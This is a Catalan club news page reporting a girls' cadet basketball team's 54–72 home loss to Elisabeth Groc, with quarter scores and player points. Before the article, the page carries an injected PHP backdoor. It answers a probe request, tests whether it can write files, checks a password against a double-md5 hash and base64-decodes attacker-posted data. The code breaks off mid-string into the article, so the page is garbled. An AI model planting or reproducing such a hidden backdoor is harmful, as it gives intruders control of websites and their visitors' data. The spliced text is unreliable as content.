function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Primera derrota de l'any! -

Primera derrota de l’any!

Updated: octubre 31, 2022

Quart partit de la temporada del Cadet femení 08C, tercer duel com a local, i primera derrota contra Elisabeth Groc (54-72).

Els primers minuts contra Elisabeth Groc no han estat bons de les tarragonines, en un matx que ha començat complicant-se (4 a 22 en contra). La previsió era defensar fort i córrer al contraatac arran de tancar el rebot, però les tarragonines no van tenir l’esperit defensiu dels tres primers partits. El segon quart les Liles van aconseguir empatar-lo (18-18), però la diferència generada en els 10 primers minuts de partit va ser una llosa per l’equip local.

A la represa, la dinàmica va ser la mateixa que a partir del segon període, molta igualtat i intercanvis de cistella constants. Així doncs, els primers minuts del duel van marcar el resultat final del partit. Malgrat la derrota, l’equip continua segon a la classificació.

TGN BÀSQUET 08C: 54 – ELISABETH GROC 72
6-24 / 18-18// 15-17 / 15-13

Cadet femení 08C: Sabate (4); Esteve (9); Aldecoa (8); Montesinos (4); Latorre (6) – cinc inicial – Aguilar (6); Urbaneja (9); Gonzalbo (4); Fernandez; Estevez; Benaiges (4).
LES XIFRES DEL PARTIT: Tirs Lliures: ½ . Triples : 3 (Montesinos, Esteve i Urbaneja) Faltes: 9.

Elisabeth Groc: Jardí (21); Martinez P (22); Martinez C (19); Ramos; May (10)- cinc inicial – Shashkinia; Vaillo; Peinado.
LES XIFRES DEL PARTIT: Tirs Lliures : 3/9. Triples : 5 de Martinez C Faltes: 3